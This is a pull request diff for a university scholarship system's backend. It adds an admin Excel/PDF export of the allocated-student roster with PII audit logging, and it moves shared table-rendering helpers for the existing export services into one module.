### PR TITLE
feat: 管理員分發名單支援匯出 Excel 與 PDF（國科會受獎名冊版面）

### DIFF
--- a/backend/CLAUDE.md
+++ b/backend/CLAUDE.md
@@ -101,7 +101,7 @@ Hard-won from the 2026-05-30 backend-test-backlog cleanup (cleared ~150 failures
 
 ### CI suite layout (`.github/workflows/ci.yml`)
 - **unit**: `app/tests/test_*.py -m "not integration and not asyncio"` — sync tests only.
-- **integration**: `app/tests/test_*_service*.py -m "integration or asyncio"` — async tests. `asyncio_mode = auto`, so any `async def test_` is auto-collected here (it is EXCLUDED from unit).
+- **integration**: `app/tests/test_*.py -m "integration or asyncio"` — async tests. `asyncio_mode = auto`, so any `async def test_` is auto-collected here (it is EXCLUDED from unit). The path glob is ALL test files, not `test_*_service*.py` — that narrower glob was the bug that silently dropped ~64 files whose async tests matched no lane (see the comment at `ci.yml:302-317`); `test_no_orphaned_async_tests.py` now guards the invariant.
 - **smoke**: explicit file list (includes `test_critical_workflows.py`). The former dedicated `critical-workflows` lane was removed as redundant — that file already runs in smoke + integration.
 - A test that is `@pytest.mark.asyncio` / `async def` runs in **integration**, not unit. Converting a sync test to async moves it between suites.
 

--- a/backend/app/api/v1/endpoints/college_review/application_summary_export.py
+++ b/backend/app/api/v1/endpoints/college_review/application_summary_export.py
@@ -13,7 +13,6 @@ from __future__ import annotations
 
 import io
 import logging
-import re
 import zipfile
 from typing import Literal, Optional
 from urllib.parse import quote as _url_quote
@@ -39,6 +38,14 @@ from app.services.college_ranking_export_service import (
 # module; the single definition now lives in the service layer.
 from app.services.export_summary_tables import _sort_key
 
+# Re-exported for the sibling college_review export endpoints that import these
+# from here; the single definition lives in the shared util.
+from app.utils.export_download import (
+    XLSX_MEDIA_TYPE,
+    ZIP_MEDIA_TYPE,
+    sanitise_filename_part,
+)
+
 from ._helpers import (
     _check_academic_year_permission,
     _check_scholarship_permission,
@@ -49,16 +56,6 @@ from ._helpers import (
 logger = logging.getLogger(__name__)
 
 router = APIRouter()
-
-XLSX_MEDIA_TYPE = "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet"
-ZIP_MEDIA_TYPE = "application/zip"
-
-# Characters not allowed in cross-platform filenames
-_UNSAFE_FILENAME_RE = re.compile(r'[\\/:*?"<>|]')
-
-
-def _sanitise_filename_part(value: str) -> str:
-    return _UNSAFE_FILENAME_RE.sub("_", value).strip() or "untitled"
 
 
 @router.get("/applications/department-summary-export")
@@ -181,7 +178,7 @@ async def export_department_summary_single(
     title = f"{academic_year}學年度{scholarship_name}學生資料彙整表 - {dept_name}"
     sheet_name = f"{academic_year}學年"
     base_filename = (
-        f"{academic_year}學年度{scholarship_name}學生資料彙整表" f"_{_sanitise_filename_part(dept_name)}.xlsx"
+        f"{academic_year}學年度{scholarship_name}學生資料彙整表" f"_{sanitise_filename_part(dept_name)}.xlsx"
     )
     encoded = _url_quote(base_filename, safe="")
 
@@ -388,7 +385,7 @@ async def export_department_summary_bulk(
             )
             inner_name = (
                 f"{academic_year}學年度{scholarship_name}學生資料彙整表"
-                f"_{_sanitise_filename_part(dept_name)}_{_sanitise_filename_part(dept_code)}.xlsx"
+                f"_{sanitise_filename_part(dept_name)}_{sanitise_filename_part(dept_code)}.xlsx"
             )
             zf.writestr(inner_name, xlsx_bytes)
 
@@ -396,8 +393,7 @@ async def export_department_summary_bulk(
 
     scope_label = resolved_college_code if scope == "college" else "全部"
     base_filename = (
-        f"{academic_year}學年度{scholarship_name}學生資料彙整表"
-        f"_{_sanitise_filename_part(scope_label or '全部')}.zip"
+        f"{academic_year}學年度{scholarship_name}學生資料彙整表" f"_{sanitise_filename_part(scope_label or '全部')}.zip"
     )
     encoded = _url_quote(base_filename, safe="")
 

--- a/backend/app/api/v1/endpoints/college_review/distribution.py
+++ b/backend/app/api/v1/endpoints/college_review/distribution.py
@@ -33,7 +33,7 @@ from app.services.college_review_service import (
 )
 
 from ._helpers import assert_can_manage_ranking, load_college_distribution_results, normalize_semester_value
-from .application_summary_export import XLSX_MEDIA_TYPE
+from app.utils.export_download import XLSX_MEDIA_TYPE
 
 logger = logging.getLogger(__name__)
 

--- a/backend/app/api/v1/endpoints/college_review/ranking_management.py
+++ b/backend/app/api/v1/endpoints/college_review/ranking_management.py
@@ -45,7 +45,7 @@ from app.services.review_service import ReviewService
 from app.utils.application_helpers import get_college_code_from_data
 from app.services.supplementary_import_service import SupplementaryImportService
 
-from .application_summary_export import XLSX_MEDIA_TYPE
+from app.utils.export_download import XLSX_MEDIA_TYPE
 from ._helpers import (
     _check_academic_year_permission,
     _check_scholarship_permission,

--- a/backend/app/api/v1/endpoints/manual_distribution.py
+++ b/backend/app/api/v1/endpoints/manual_distribution.py
@@ -5,12 +5,15 @@ Provides endpoints for admin to manually allocate scholarships to students.
 """
 
 import logging
-from typing import Optional
+from typing import Literal, NamedTuple, Optional
+from urllib.parse import quote as _url_quote
 
 from fastapi import APIRouter, BackgroundTasks, Depends, HTTPException, Query, Request, status
+from fastapi.responses import StreamingResponse
 from pydantic import BaseModel
 from sqlalchemy import and_, or_, select
 from sqlalchemy.ext.asyncio import AsyncSession
+from sqlalchemy.orm import selectinload
 
 from app.core.deps import get_current_admin_user, get_db
 from app.db.deps import get_sync_db
@@ -19,13 +22,19 @@ from app.models.application import Application
 from app.models.audit_log import AuditAction, AuditLog
 from app.models.college_review import CollegeRanking, CollegeRankingItem, ManualDistributionHistory
 from app.models.email_management import EmailCategory
-from app.models.scholarship import ScholarshipConfiguration, ScholarshipType
+from app.models.scholarship import ScholarshipConfiguration, ScholarshipSubTypeConfig, ScholarshipType
 from app.models.user import User
 from app.schemas.application import RevokeRequest, SuspendRequest
 from app.services.application_audit_service import ApplicationAuditService
 from app.services.email_service import EmailService
+from app.services.manual_distribution_export_service import (
+    ManualDistributionExportService,
+    RecipientExportGroup,
+    build_recipient_row,
+)
 from app.services.manual_distribution_service import ManualDistributionService
 from app.utils.date_utils import now_taipei_str
+from app.utils.export_download import XLSX_MEDIA_TYPE, sanitise_filename_part
 
 logger = logging.getLogger(__name__)
 
@@ -423,6 +432,101 @@ async def restore_from_history(
         ) from e
 
 
+class _AllocatedGroup(NamedTuple):
+    """One 分發 group: sub_type × 消耗配額 config, with its allocated items."""
+
+    sub_type: str
+    allocation_config_id: Optional[int]
+    allocation_year: Optional[int]
+    items: list  # CollegeRankingItem, with .application / .allocation_config loaded
+
+
+async def _load_allocated_groups(
+    db: AsyncSession,
+    *,
+    scholarship_type_id: int,
+    academic_year: int,
+    semester: str,
+) -> Optional[list[_AllocatedGroup]]:
+    """Load every allocated student, grouped by (sub_type, allocation_config_id).
+
+    Shared by the distribution-summary JSON endpoint and its file export, so the
+    exported file can never disagree with the 分發結果名單 panel.
+
+    Returns ``None`` when NO finalized+executed ranking exists (尚未完成分發) —
+    distinct from ``[]``, which means the distribution ran but zero students are
+    currently allocated.
+    """
+    # 取得已完成分發的排名
+    if semester in ("annual", "yearly", ""):
+        sem_filter = or_(
+            CollegeRanking.semester.is_(None),
+            CollegeRanking.semester == "annual",
+            CollegeRanking.semester == "yearly",
+        )
+    else:
+        sem_filter = CollegeRanking.semester == semester
+
+    ranking_stmt = select(CollegeRanking).where(
+        and_(
+            CollegeRanking.scholarship_type_id == scholarship_type_id,
+            CollegeRanking.academic_year == academic_year,
+            sem_filter,
+            CollegeRanking.is_finalized.is_(True),
+            CollegeRanking.distribution_executed.is_(True),
+        )
+    )
+    ranking_result = await db.execute(ranking_stmt)
+    rankings = ranking_result.scalars().all()
+    if not rankings:
+        return None
+
+    ranking_ids = [r.id for r in rankings]
+
+    # 取得所有已分配的 ranking items
+    items_stmt = (
+        select(CollegeRankingItem)
+        .where(
+            and_(
+                CollegeRankingItem.ranking_id.in_(ranking_ids),
+                CollegeRankingItem.is_allocated.is_(True),
+            )
+        )
+        .options(
+            selectinload(CollegeRankingItem.application),
+            selectinload(CollegeRankingItem.allocation_config),
+        )
+    )
+    items_result = await db.execute(items_stmt)
+    allocated_items = items_result.scalars().all()
+
+    # 按 (sub_type, allocation_config_id) 分組；顯示年度取自消耗的配置
+    grouped: dict[tuple, list] = {}
+    for item in allocated_items:
+        sub_type = item.allocated_sub_type or "general"
+        grouped.setdefault((sub_type, item.allocation_config_id), []).append(item)
+
+    groups: list[_AllocatedGroup] = []
+    # None allocation_config_id (whole-period sentinel) sorts first via -1
+    for (sub_type, config_id), items in sorted(
+        grouped.items(),
+        key=lambda kv: (kv[0][0], kv[0][1] if kv[0][1] is not None else -1),
+    ):
+        # Display year = consumed config's academic_year (falls back to the
+        # requesting year for whole-period rows with no linked config).
+        consumed = items[0].allocation_config if items else None
+        alloc_year = consumed.academic_year if consumed else academic_year
+        groups.append(
+            _AllocatedGroup(
+                sub_type=sub_type,
+                allocation_config_id=config_id,
+                allocation_year=alloc_year,
+                items=items,
+            )
+        )
+    return groups
+
+
 @router.get("/distribution-summary")
 async def get_distribution_summary(
     scholarship_type_id: int = Query(...),
@@ -435,78 +539,25 @@ async def get_distribution_summary(
     取得分發結果摘要：所有被分發的學生及其分配到的獎學金子類型。
     回傳所有已分配學生，按 sub_type × allocation_year 分組。
     """
-    from sqlalchemy import and_, or_
-    from sqlalchemy.orm import selectinload
-
     try:
-        # 取得已完成分發的排名
-        if semester in ("annual", "yearly", ""):
-            sem_filter = or_(
-                CollegeRanking.semester.is_(None),
-                CollegeRanking.semester == "annual",
-                CollegeRanking.semester == "yearly",
-            )
-        else:
-            sem_filter = CollegeRanking.semester == semester
-
-        ranking_stmt = select(CollegeRanking).where(
-            and_(
-                CollegeRanking.scholarship_type_id == scholarship_type_id,
-                CollegeRanking.academic_year == academic_year,
-                sem_filter,
-                CollegeRanking.is_finalized.is_(True),
-                CollegeRanking.distribution_executed.is_(True),
-            )
+        groups = await _load_allocated_groups(
+            db,
+            scholarship_type_id=scholarship_type_id,
+            academic_year=academic_year,
+            semester=semester,
         )
-        ranking_result = await db.execute(ranking_stmt)
-        rankings = ranking_result.scalars().all()
-
-        if not rankings:
+        if groups is None:
             return {
                 "success": True,
                 "message": "尚未完成分發",
                 "data": {"groups": [], "total_allocated": 0},
             }
 
-        ranking_ids = [r.id for r in rankings]
-
-        # 取得所有已分配的 ranking items
-        items_stmt = (
-            select(CollegeRankingItem)
-            .where(
-                and_(
-                    CollegeRankingItem.ranking_id.in_(ranking_ids),
-                    CollegeRankingItem.is_allocated.is_(True),
-                )
-            )
-            .options(
-                selectinload(CollegeRankingItem.application),
-                selectinload(CollegeRankingItem.allocation_config),
-            )
-        )
-        items_result = await db.execute(items_stmt)
-        allocated_items = items_result.scalars().all()
-
-        # 按 (sub_type, allocation_config_id) 分組；顯示年度取自消耗的配置
-        groups: dict[tuple, list] = {}
-        for item in allocated_items:
-            sub_type = item.allocated_sub_type or "general"
-            key = (sub_type, item.allocation_config_id)
-            groups.setdefault(key, []).append(item)
-
         group_data = []
         total_allocated = 0
-        # None allocation_config_id (whole-period sentinel) sorts first via -1
-        for (sub_type, config_id), items in sorted(
-            groups.items(),
-            key=lambda kv: (kv[0][0], kv[0][1] if kv[0][1] is not None else -1),
-        ):
-            # Display year = consumed config's academic_year (falls back to the
-            # requesting year for whole-period rows with no linked config).
-            consumed = items[0].allocation_config if items else None
-            alloc_year = consumed.academic_year if consumed else academic_year
+        for group in groups:
             students = []
-            for item in items:
+            for item in group.items:
                 app = item.application
                 sd = (app.student_data or {}) if app else {}
                 students.append(
@@ -519,6 +570,12 @@ async def get_distribution_summary(
                         "college_name": sd.get("trm_academyname", ""),
                         "department_name": sd.get("trm_depname", ""),
                         "rank_position": item.rank_position,
+                        # The panel renders a red "N" instead of the rank for these.
+                        # An allocated-but-college-rejected row is legitimate: admin
+                        # may allocate over a college rejection (see CollegeRankingItem
+                        # .college_rejected), so the list must not hide it.
+                        "college_rejected": bool(item.college_rejected),
+                        "is_supplementary": bool(item.is_supplementary),
                         "is_renewal": app.is_renewal if app else False,
                         "renewal_year": app.renewal_year if app else None,
                     }
@@ -526,9 +583,9 @@ async def get_distribution_summary(
             total_allocated += len(students)
             group_data.append(
                 {
-                    "sub_type": sub_type,
-                    "allocation_config_id": config_id,
-                    "allocation_year": alloc_year,
+                    "sub_type": group.sub_type,
+                    "allocation_config_id": group.allocation_config_id,
+                    "allocation_year": group.allocation_year,
                     "count": len(students),
                     "students": students,
                 }
@@ -548,6 +605,170 @@ async def get_distribution_summary(
             status_code=status.HTTP_500_INTERNAL_SERVER_ERROR,
             detail="取得分發摘要失敗",
         ) from e
+
+
+_SEMESTER_EXPORT_LABELS = {"first": "第一學期", "second": "第二學期"}
+
+
+def _export_sort_key(item) -> tuple:
+    """(學院代碼, 名次, id) for one allocated ranking item.
+
+    The college code comes from the same snapshot keys the JSON summary uses, so
+    the export and the panel bucket a student into the same college.
+    """
+    app = item.application
+    sd = (app.student_data or {}) if app else {}
+    college = sd.get("std_academyno") or sd.get("trm_academyno") or ""
+    return (str(college), item.rank_position or 0, item.id)
+
+
+@router.get("/distribution-summary/export")
+async def export_distribution_summary(
+    request: Request,
+    scholarship_type_id: int = Query(...),
+    academic_year: int = Query(...),
+    semester: str = Query(...),
+    format: Literal["xlsx", "pdf"] = Query("xlsx", description="Output format: xlsx (default) or pdf"),
+    db: AsyncSession = Depends(get_db),
+    current_user=Depends(get_current_admin_user),
+):
+    """Export the 分發結果名單 as Excel (default) or PDF — 受獎名冊 layout.
+
+    Reads through the SAME ``_load_allocated_groups`` loader as the JSON
+    endpoint, so the file can never show a student the panel would not.
+
+    Carries no 身分證字號 and no 匯款帳號, but it is NOT the PII-free case the
+    college 分發結果 export is: on top of 學號/姓名/系所 it emits 國籍, 性別,
+    碩士畢業院/校/系所 and 首次註冊入學日期, plus three derived flags that label a
+    student as 在職生 / 陸港澳生 / 休學. That is personal data about identified
+    students leaving the system in bulk, so it writes a ``pii_access`` AuditLog
+    like the 學生資料彙整表 export does.
+    """
+    log_extra = {
+        "actor_user_id": current_user.id,
+        "actor_role": (current_user.role.value if hasattr(current_user.role, "value") else str(current_user.role)),
+        "scholarship_type_id": scholarship_type_id,
+        "academic_year": academic_year,
+        "semester": semester,
+        "export_format": format,
+    }
+
+    groups = await _load_allocated_groups(
+        db,
+        scholarship_type_id=scholarship_type_id,
+        academic_year=academic_year,
+        semester=semester,
+    )
+    if groups is None:
+        logger.warning("distribution-summary export rejected: no finalized distribution", extra=log_extra)
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="尚未完成分發，無法匯出")
+    if not groups:
+        logger.warning("distribution-summary export rejected: no allocated students", extra=log_extra)
+        raise HTTPException(status_code=status.HTTP_404_NOT_FOUND, detail="尚無已分配的學生可匯出")
+
+    # Sub-type display labels from configuration (NOT the hardcoded legacy maps);
+    # unknown / historical codes fall through as the raw code. Deliberately no
+    # is_active filter: a finalized distribution may reference a since-disabled
+    # sub-type and its label must still render.
+    label_rows = await db.execute(
+        select(ScholarshipSubTypeConfig.sub_type_code, ScholarshipSubTypeConfig.name).where(
+            ScholarshipSubTypeConfig.scholarship_type_id == scholarship_type_id
+        )
+    )
+    sub_type_labels = {code: name for code, name in label_rows.all()}
+
+    # scalar_one() not scalar_one_or_none(): finalized rankings exist for this id
+    # (checked above) and they FK onto scholarship_types — a miss here is a broken
+    # invariant that must surface, not be papered over with a default title.
+    scholarship_name = (
+        await db.execute(select(ScholarshipType.name).where(ScholarshipType.id == scholarship_type_id))
+    ).scalar_one()
+
+    export_groups = []
+    _seq_counter = 0
+    for group in groups:
+        # Order by 學院 first, then rank. rank_position is scoped to ONE college's
+        # CollegeRanking, so sorting on it alone interleaves colleges (工學院 #1,
+        # 電機 #1, 工學院 #2 …) and the roster reads as if the ranks were global.
+        # Matches get_students_for_distribution's (college_code, rank_position).
+        ordered_items = sorted(group.items, key=_export_sort_key)
+        rows = []
+        for _it in ordered_items:
+            _seq_counter += 1
+            rows.append(build_recipient_row(_seq_counter, _it.application))
+        export_groups.append(
+            RecipientExportGroup(
+                label=sub_type_labels.get(group.sub_type, group.sub_type),
+                sub_type_code=group.sub_type,
+                allocation_year=group.allocation_year,
+                rows=rows,
+            )
+        )
+
+    semester_label = _SEMESTER_EXPORT_LABELS.get(semester, "")
+    title = f"{academic_year}學年度{semester_label}{scholarship_name}分發名單"
+    stem = sanitise_filename_part(f"分發名單_{scholarship_name}_{academic_year}學年度{semester_label}".rstrip("_"))
+    encoded = _url_quote(f"{stem}.{format}", safe="")
+
+    service = ManualDistributionExportService()
+    if format == "pdf":
+        payload = service.build_pdf(groups=export_groups, title=title)
+        media_type = "application/pdf"
+    else:
+        payload = service.build_workbook(groups=export_groups, title=title)
+        media_type = XLSX_MEDIA_TYPE
+
+    student_count = sum(len(g.rows) for g in export_groups)
+    logger.info(
+        "distribution-summary export issued: groups=%d students=%d size_bytes=%d",
+        len(export_groups),
+        student_count,
+        len(payload),
+        extra={**log_extra, "export_filename": f"{stem}.{format}", "size_bytes": len(payload)},
+    )
+
+    exported_app_ids = [item.application_id for group in groups for item in group.items]
+    try:
+        db.add(
+            AuditLog(
+                user_id=current_user.id,
+                action=AuditAction.pii_access.value,
+                resource_type="scholarship_type",
+                resource_id=str(scholarship_type_id),
+                resource_name=f"{stem}.{format}",
+                description=(
+                    f"匯出分發名單（含國籍/性別/學籍檢核）: scholarship_type_id={scholarship_type_id}, "
+                    f"academic_year={academic_year}, records={student_count}"
+                ),
+                ip_address=(request.client.host if request.client else None),
+                user_agent=request.headers.get("user-agent"),
+                request_method=request.method,
+                request_url=str(request.url.path),
+                status="success",
+                meta_data={
+                    "scholarship_type_id": scholarship_type_id,
+                    "academic_year": academic_year,
+                    "semester": semester,
+                    "record_count": student_count,
+                    "application_ids": exported_app_ids,
+                    "pii_fields": ["std_cname", "std_stdcode", "std_nation", "std_sex", "std_enrollyear"],
+                    "export_format": format,
+                },
+            )
+        )
+        await db.commit()
+    except Exception:  # noqa: BLE001 — audit failure must not block the download
+        logger.exception("Failed to record pii_access audit log for distribution-summary export")
+        await db.rollback()
+
+    return StreamingResponse(
+        iter([payload]),
+        media_type=media_type,
+        headers={
+            "Content-Disposition": f"attachment; filename*=UTF-8''{encoded}",
+            "Content-Length": str(len(payload)),
+        },
+    )
 
 
 class GenerateRostersRequest(BaseModel):

--- a/backend/app/services/college_distribution_export_service.py
+++ b/backend/app/services/college_distribution_export_service.py
@@ -8,11 +8,10 @@ layer is responsible for loading and authorizing the data.
 (``_headers``), per-row cell values (``_row_cells``) and column sizing
 (``_COLUMNS`` weights), so the two formats never drift apart.
 
-This module is a deliberate FORK of ``college_ranking_export_service`` — the
-table-rendering chassis (PDF styles, KeepInFrame cells, border/width helpers) was
-copied from it rather than shared, so a fix to that chassis likely belongs in BOTH
-modules. If a THIRD export service is ever needed, extract the shared chassis
-instead of forking again.
+The table-rendering chassis (PDF styles, KeepInFrame cells, border/width
+helpers) lives in ``app.services.export_table_chassis``, shared with
+``manual_distribution_export_service``. ``college_ranking_export_service`` still
+carries its own pre-extraction copy — a chassis fix likely belongs there too.
 
 Unlike the 學生資料彙整表 export this carries NO PII (no 身分證字號, no 匯款帳號):
 colleges get exactly what the 分發結果 panel already shows them.
@@ -24,27 +23,32 @@ import io
 from dataclasses import dataclass
 from typing import Any, Dict, List, Optional, Tuple
 
-# `escape` is a pure string-escaping helper (`<` → `&lt;` …) used to sanitise
-# cell values before they go into reportlab Paragraph markup. It does not parse
-# untrusted XML, so the B406 warning is a false positive here.
-from xml.sax.saxutils import escape as xml_escape  # nosec B406
-
 from openpyxl import Workbook
-from openpyxl.styles import Alignment, Border, Font, PatternFill, Side
-from openpyxl.utils import get_column_letter
-from reportlab.lib import colors
 from reportlab.lib.pagesizes import A4, landscape
-from reportlab.lib.styles import ParagraphStyle
 from reportlab.lib.units import mm
-from reportlab.platypus import KeepInFrame, Paragraph, SimpleDocTemplate, Spacer, Table, TableStyle
+from reportlab.platypus import SimpleDocTemplate, Spacer, Table, TableStyle
 
-from app.services.pdf_fonts import CJK_FONT_NAME, ensure_cjk_font
+from app.services.export_table_chassis import (
+    PDF_HEADER_RESERVE_PT,
+    PDF_MARGIN_PT,
+    apply_xlsx_borders,
+    apply_xlsx_column_widths,
+    base_pdf_table_style,
+    make_pdf_styles,
+    pdf_cell,
+    pdf_col_widths,
+    pdf_paragraph,
+    safe_str,
+    style_xlsx_header_cell,
+    write_xlsx_title_row,
+)
+from app.services.pdf_fonts import ensure_cjk_font
 from app.utils.excel_safety import sanitize_excel_cell
 
 # (header label, PDF column weight). HEADERS and the PDF weight vector are both
 # derived from this one list so they can never drift — renaming a label can't
 # silently mis-size a column. The normalize-to-page-width math lives in
-# _pdf_col_widths.
+# the chassis' pdf_col_widths.
 _COLUMNS: List[Tuple[str, float]] = [
     ("類別", 1.4),
     ("結果", 0.7),
@@ -123,22 +127,11 @@ class CollegeDistributionExportService:
         headers = self._headers()
         total_cols = len(headers)
 
-        # Row 1: title (merged across all columns). Sanitized like the data rows: the
-        # caller's f-string happens to lead with an int today, but that is incidental —
-        # this keeps a formula trigger impossible regardless of how the title is built.
-        ws.cell(row=1, column=1, value=sanitize_excel_cell(title))
-        if total_cols > 1:
-            ws.merge_cells(start_row=1, start_column=1, end_row=1, end_column=total_cols)
-        title_cell = ws.cell(row=1, column=1)
-        title_cell.font = Font(bold=True, size=14)
-        title_cell.alignment = Alignment(horizontal="center", vertical="center")
+        write_xlsx_title_row(ws, title=title, total_cols=total_cols)
 
         # Row 2: header
         for col_idx, header in enumerate(headers, start=1):
-            cell = ws.cell(row=2, column=col_idx, value=header)
-            cell.font = Font(bold=True)
-            cell.alignment = Alignment(horizontal="center", vertical="center", wrap_text=True)
-            cell.fill = PatternFill("solid", fgColor="DDDDDD")
+            style_xlsx_header_cell(ws.cell(row=2, column=col_idx, value=header))
 
         # Data rows — written from the same _row_cells used by the PDF export
         for idx, row in enumerate(rows, start=1):
@@ -149,8 +142,8 @@ class CollegeDistributionExportService:
                 ws.cell(row=excel_row, column=col_idx, value=sanitize_excel_cell(value))
 
         max_row = len(rows) + 2
-        self._apply_borders(ws, max_row=max_row, max_col=total_cols)
-        self._apply_column_widths(ws)
+        apply_xlsx_borders(ws, max_row=max_row, max_col=total_cols)
+        apply_xlsx_column_widths(ws, _COL_WEIGHTS)
         ws.freeze_panes = "A3"
 
         buf = io.BytesIO()
@@ -173,90 +166,43 @@ class CollegeDistributionExportService:
         headers = self._headers()
 
         page_width, page_height = landscape(A4)
-        usable_width = page_width - (self._PDF_MARGIN_PT * 2)
+        usable_width = page_width - (PDF_MARGIN_PT * 2)
         col_widths = self._pdf_col_widths(usable_width)
-        # A reportlab Table cannot split ONE row across pages, so a single very long
-        # cell would raise LayoutError and fail the WHOLE export. Cap each cell to the
-        # usable content height and let KeepInFrame shrink anything taller to fit.
-        cell_max_height = page_height - (self._PDF_MARGIN_PT * 2) - self._PDF_HEADER_RESERVE_PT
+        cell_max_height = page_height - (PDF_MARGIN_PT * 2) - PDF_HEADER_RESERVE_PT
 
-        title_style = ParagraphStyle(
-            "DistributionPdfTitle",
-            fontName=CJK_FONT_NAME,
-            fontSize=12,
-            leading=15,
-            alignment=1,  # center
-        )
-        header_style = ParagraphStyle(
-            "DistributionPdfHeader",
-            fontName=CJK_FONT_NAME,
-            fontSize=8,
-            leading=10,
-            alignment=1,
-            wordWrap="CJK",
-        )
-        cell_style = ParagraphStyle(
-            "DistributionPdfCell",
-            fontName=CJK_FONT_NAME,
-            fontSize=7.5,
-            leading=9,
-            wordWrap="CJK",  # break long CJK and unspaced ASCII
-        )
+        title_style, header_style, cell_style = make_pdf_styles("Distribution")
 
-        data: List[list] = [[Paragraph(xml_escape(h), header_style) for h in headers]]
+        data: List[list] = [[pdf_paragraph(h, header_style) for h in headers]]
         for row in rows:
             values = self._row_cells(row)
             data.append(
                 [
-                    KeepInFrame(
-                        col_widths[col],
-                        cell_max_height,
-                        [Paragraph(xml_escape(self._safe_str(v)), cell_style)],
-                        mode="shrink",
-                    )
+                    pdf_cell(safe_str(v), width=col_widths[col], max_height=cell_max_height, style=cell_style)
                     for col, v in enumerate(values)
                 ]
             )
 
         table = Table(data, colWidths=col_widths, repeatRows=1)
-        table.setStyle(
-            TableStyle(
-                [
-                    ("GRID", (0, 0), (-1, -1), 0.4, colors.Color(0.6, 0.6, 0.6)),
-                    ("BACKGROUND", (0, 0), (-1, 0), colors.Color(0.87, 0.87, 0.87)),
-                    ("VALIGN", (0, 0), (-1, -1), "TOP"),
-                    ("FONTNAME", (0, 0), (-1, -1), CJK_FONT_NAME),
-                    ("LEFTPADDING", (0, 0), (-1, -1), 3),
-                    ("RIGHTPADDING", (0, 0), (-1, -1), 3),
-                    ("TOPPADDING", (0, 0), (-1, -1), 2),
-                    ("BOTTOMPADDING", (0, 0), (-1, -1), 2),
-                ]
-            )
-        )
+        table.setStyle(TableStyle(base_pdf_table_style()))
 
         buf = io.BytesIO()
         doc = SimpleDocTemplate(
             buf,
             pagesize=landscape(A4),
-            leftMargin=self._PDF_MARGIN_PT,
-            rightMargin=self._PDF_MARGIN_PT,
-            topMargin=self._PDF_MARGIN_PT,
-            bottomMargin=self._PDF_MARGIN_PT,
+            leftMargin=PDF_MARGIN_PT,
+            rightMargin=PDF_MARGIN_PT,
+            topMargin=PDF_MARGIN_PT,
+            bottomMargin=PDF_MARGIN_PT,
         )
-        doc.build([Paragraph(xml_escape(title), title_style), Spacer(1, 4 * mm), table])
+        doc.build([pdf_paragraph(title, title_style), Spacer(1, 4 * mm), table])
         return buf.getvalue()
 
     # -------- PDF layout helpers --------
 
-    _PDF_MARGIN_PT = 10 * mm
-    # Vertical space reserved (per page) for the title + spacer + repeated header row.
-    _PDF_HEADER_RESERVE_PT = 60
-
     def _pdf_col_widths(self, usable_width: float) -> List[float]:
-        # Unlike the sibling service the column set here is static, so the weights come
+        # Unlike the ranking service the column set here is static, so the weights come
         # straight from _COL_WEIGHTS — no headers argument needed.
-        total = sum(_COL_WEIGHTS) or 1.0
-        return [usable_width * w / total for w in _COL_WEIGHTS]
+        return pdf_col_widths(_COL_WEIGHTS, usable_width)
 
     # -------- Shared column/value model (single source of truth) --------
 
@@ -279,31 +225,3 @@ class CollegeDistributionExportService:
             row.department,
             row.applied_scholarships,
         ]
-
-    def _safe_str(self, value: Any) -> str:
-        if value is None:
-            return ""
-        return str(value)
-
-    # -------- Formatting --------
-
-    def _apply_borders(self, ws, *, max_row: int, max_col: int) -> None:
-        thin = Side(style="thin", color="999999")
-        border = Border(left=thin, right=thin, top=thin, bottom=thin)
-        for r in range(2, max_row + 1):
-            for c in range(1, max_col + 1):
-                ws.cell(row=r, column=c).border = border
-
-    # Excel width per unit of PDF column weight, plus a fixed padding allowance. Chosen
-    # so the narrowest column (名次, weight 0.6) still fits its header comfortably.
-    _XLSX_WIDTH_PER_WEIGHT = 8
-    _XLSX_WIDTH_PADDING = 6
-
-    def _apply_column_widths(self, ws) -> None:
-        # Sized from the SAME _COLUMNS weights the PDF uses, so the two formats keep
-        # one source of truth for relative column sizing (deriving width from header
-        # text length instead would clamp every 2-char CJK header to an identical
-        # width, silently ignoring the weights).
-        for idx, weight in enumerate(_COL_WEIGHTS, start=1):
-            width = round(self._XLSX_WIDTH_PER_WEIGHT * weight) + self._XLSX_WIDTH_PADDING
-            ws.column_dimensions[get_column_letter(idx)].width = width

--- a/backend/app/services/export_table_chassis.py
+++ b/backend/app/services/export_table_chassis.py
@@ -38,8 +38,14 @@ from app.services.pdf_fonts import CJK_FONT_NAME
 from app.utils.excel_safety import sanitize_excel_cell
 
 PDF_MARGIN_PT = 10 * mm
-# Vertical space reserved (per page) for the title + spacer + repeated header rows.
+# Vertical space reserved (per page) for the title + spacer + ONE repeated header
+# row. Renderers with a taller repeated header (e.g. two header rows) must NOT
+# reuse this — measure instead, via `pdf_cell_max_height(..., header_height=...)`.
 PDF_HEADER_RESERVE_PT = 60
+
+# reportlab's SimpleDocTemplate gives its Frame 6pt of padding top and bottom,
+# which is not part of the page margins and so has to come off the usable height.
+PDF_FRAME_PADDING_PT = 12
 
 # Excel width per unit of PDF column weight, plus a fixed padding allowance.
 XLSX_WIDTH_PER_WEIGHT = 8
@@ -90,6 +96,29 @@ def pdf_col_widths(weights: Sequence[float], usable_width: float) -> List[float]
     """Normalise relative column weights to the usable page width."""
     total = sum(weights) or 1.0
     return [usable_width * w / total for w in weights]
+
+
+# Slack left over the measured header so rounding and a slightly taller wrap
+# (fonts metrics differ per platform) still can't push a capped row over.
+PDF_CELL_SAFETY_PT = 10
+
+
+def pdf_cell_max_height(page_height: float, *, header_height: float) -> float:
+    """Tallest a single body cell may be and still fit a CONTINUATION page.
+
+    A reportlab ``Table`` cannot split one row across pages, so an overlong cell
+    raises ``LayoutError`` and fails the WHOLE export. The binding constraint is a
+    continuation page, which carries the repeated header rows but not the title —
+    so the cap is the frame height minus the REAL header height.
+
+    Pass the measured header height (``table.wrap(...)`` on a header-only table)
+    rather than a guessed constant: a renderer with two header rows needs roughly
+    twice the reserve of one, and guessing 60pt for a ~61pt header silently
+    produced a cap ~13pt too generous, which raised LayoutError on free text as
+    short as 700 characters.
+    """
+    usable = page_height - (PDF_MARGIN_PT * 2) - PDF_FRAME_PADDING_PT
+    return max(usable - header_height - PDF_CELL_SAFETY_PT, 1.0)
 
 
 def pdf_paragraph(text: Any, style: ParagraphStyle) -> Paragraph:

--- a/backend/app/services/export_table_chassis.py
+++ b/backend/app/services/export_table_chassis.py
@@ -1,0 +1,166 @@
+"""Shared table-rendering chassis for tabular xlsx/PDF exports.
+
+The chassis was born in ``college_ranking_export_service``, forked into
+``college_distribution_export_service`` (see the fork warning that used to live
+there), and extracted here when the manual-distribution 分發名單 export became
